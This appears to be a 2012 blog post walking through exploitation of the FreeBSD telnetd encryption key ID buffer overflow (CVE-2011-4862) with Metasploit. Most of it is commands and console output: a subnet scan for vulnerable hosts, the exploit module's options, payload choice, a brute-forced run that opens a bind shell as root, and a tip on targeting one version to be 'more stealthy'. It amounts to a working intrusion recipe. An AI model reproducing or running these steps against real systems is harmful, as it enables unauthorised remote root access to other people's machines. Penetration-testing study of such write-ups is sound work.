«
»

FreeBSD Derived telnetd service Exploit

Published January 18, 2012 | By phillips321

Mentioned by hdm here and here but I wanted to make a note of this myself.
First thing to do is setup the scan to look for vulnerable telnetd services:

1
2
3
4
5
msf > use auxiliary/scanner/telnet/telnet_encrypt_overflow
msf  auxiliary(telnet_encrypt_overflow) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf  auxiliary(telnet_encrypt_overflow) > set THREADS 64
THREADS => 64

And now to run the scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf  auxiliary(telnet_encrypt_overflow) > run
[*] 192.168.0.1:23 Does not support encryption: Netgear Embedded Telnet Server (c) 2000-2007\x0a\x0aWARNING:  Access allowed by authorized users only.\x0a\x0alogin: \x0aERROR - Your telnet client rejected our request to use char-at-a-time mode!\x0aUnable to operate under this condition.\r\x0a\x0a\x0a\x0aYour telnet session has expired due to inactivity...
[+] 192.168.0.13:23 VULNERABLE: FreeBSD/i386 () (ttyp0)\x0d\x0a\x0d\x0alogin:
[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 053 of 256 hosts (020% complete)
[*] Scanned 087 of 256 hosts (033% complete)
[*] Scanned 105 of 256 hosts (041% complete)
[*] Scanned 132 of 256 hosts (051% complete)
[*] Scanned 196 of 256 hosts (076% complete)
[*] Scanned 213 of 256 hosts (083% complete)
[*] Scanned 224 of 256 hosts (087% complete)
[*] Scanned 235 of 256 hosts (091% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(telnet_encrypt_overflow) >

Looks like 192.168.0.13 is vulnerable, what a surprise.
The exploit we need to use here is exploit/freebsd/telnet/telnet_encrypt_keyid:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
msf  exploit(telnet_encrypt_keyid) > info

       Name: FreeBSD Telnet Service Encryption Key ID Buffer Overflow
     Module: exploit/freebsd/telnet/telnet_encrypt_keyid
    Version: 0
   Platform: BSD
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  Jaime Penalba Estebanez <jpenalbae@gmail.com>
  Brandon Perry <bperry.volatile@gmail.com>
  Dan Rosenberg
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   FreeBSD 8.2
  2   FreeBSD 8.1
  3   FreeBSD 8.0
  4   FreeBSD 7.3/7.4
  5   FreeBSD 7.0/7.1/7.2
  6   FreeBSD 6.3/6.4
  7   FreeBSD 6.0/6.1/6.2
  8   FreeBSD 5.5
  9   FreeBSD 5.3

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  RHOST                      yes       The target address
  RPORT     23               yes       The target port
  USERNAME                   no        The username to authenticate as

Payload information:
  Space: 128
  Avoid: 1 characters

Description:
  This module exploits a buffer overflow in the encryption option
  handler of the FreeBSD telnet service.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-4862
  http://www.osvdb.org/78020
  http://www.securityfocus.com/bid/51182
  http://www.exploit-db.com/exploits/18280/

msf  exploit(telnet_encrypt_keyid) >

The payload is limited to 128 characters so we only have a few options, shell is more than enough though!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf  exploit(telnet_encrypt_keyid) > show payloads

Compatible Payloads
===================

   Name                        Disclosure Date  Rank    Description
   ----                        ---------------  ----    -----------
   bsd/x86/exec                                 normal  BSD Execute Command
   bsd/x86/metsvc_bind_tcp                      normal  FreeBSD Meterpreter Service, Bind TCP
   bsd/x86/metsvc_reverse_tcp                   normal  FreeBSD Meterpreter Service, Reverse TCP Inline
   bsd/x86/shell/bind_tcp                       normal  BSD Command Shell, Bind TCP Stager
   bsd/x86/shell/reverse_tcp                    normal  BSD Command Shell, Reverse TCP Stager
   bsd/x86/shell_bind_tcp                       normal  BSD Command Shell, Bind TCP Inline
   bsd/x86/shell_reverse_tcp                    normal  BSD Command Shell, Reverse TCP Inline
   generic/custom                               normal  Custom Payload
   generic/debug_trap                           normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                       normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                    normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                           normal  Generic x86 Tight Loop

We’ll select bsd/x86/shell/bind_tcp to make things quick.

1
2
3
4
msf  exploit(telnet_encrypt_keyid) > set payload bsd/x86/shell/bind_tcp
payload => bsd/x86/shell/bind_tcp
msf  exploit(telnet_encrypt_keyid) > set rhost 192.168.0.13
rhost => 192.168.0.13

And now to exploit, note that it trys against all versions of FreeBSD from 5.5 to 8.2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
msf  exploit(telnet_encrypt_keyid) > exploit -j
[*] Exploit running as background job.

[*] Brute forcing with 9 possible targets
[*] Trying target FreeBSD 8.2...
[*] Started bind handler
msf  exploit(telnet_encrypt_keyid) > [*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 8.1...
[*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 8.0...
[*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 7.3/7.4...
[*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 7.0/7.1/7.2...
[*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 6.3/6.4...
[*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 6.0/6.1/6.2...
[*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 5.5...
[*] Sending stage (46 bytes) to 192.168.0.13
[*] Sending first payload
[*] Command shell session 1 opened (192.168.0.8:41452 -> 192.168.0.13:4444) at 2012-01-18 11:01:05 -0500
[*] Sending second payload...

Looks like we got shell

1
2
3
4
5
msf  exploit(telnet_encrypt_keyid) > sessions -i 1
[*] Starting interaction with 1...

whoami
root

To be more stealthy you could set the exploit code to the specific version of FreeBSD you’re targeting:

1
2
3
4
5
6
7
8
9
10
11
12
13
Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   FreeBSD 8.2
  2   FreeBSD 8.1
  3   FreeBSD 8.0
  4   FreeBSD 7.3/7.4
  5   FreeBSD 7.0/7.1/7.2
  6   FreeBSD 6.3/6.4
  7   FreeBSD 6.0/6.1/6.2
  8   FreeBSD 5.5
  9   FreeBSD 5.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf  exploit(telnet_encrypt_keyid) > set target 7
target => 7
msf  exploit(telnet_encrypt_keyid) > exploit -j
[*] Exploit running as background job.

[*] Started bind handler
msf  exploit(telnet_encrypt_keyid) > [*] Sending first payload
[*] Sending second payload...
[*] Sending stage (46 bytes) to 192.168.0.13
[*] Command shell session 2 opened (192.168.0.8:48865 -> 192.168.0.13:4444) at 2012-01-18 11:03:55 -0500
sessions -l

Active sessions
===============

  Id  Type       Information  Connection
  --  ----       -----------  ----------
  2   shell bsd               192.168.0.8:48865 -> 192.168.0.13:4444
Posted in metasploit, Networking | Tagged , , , ,

Leave a Reply

Please feel free to share my content but always link back here :-)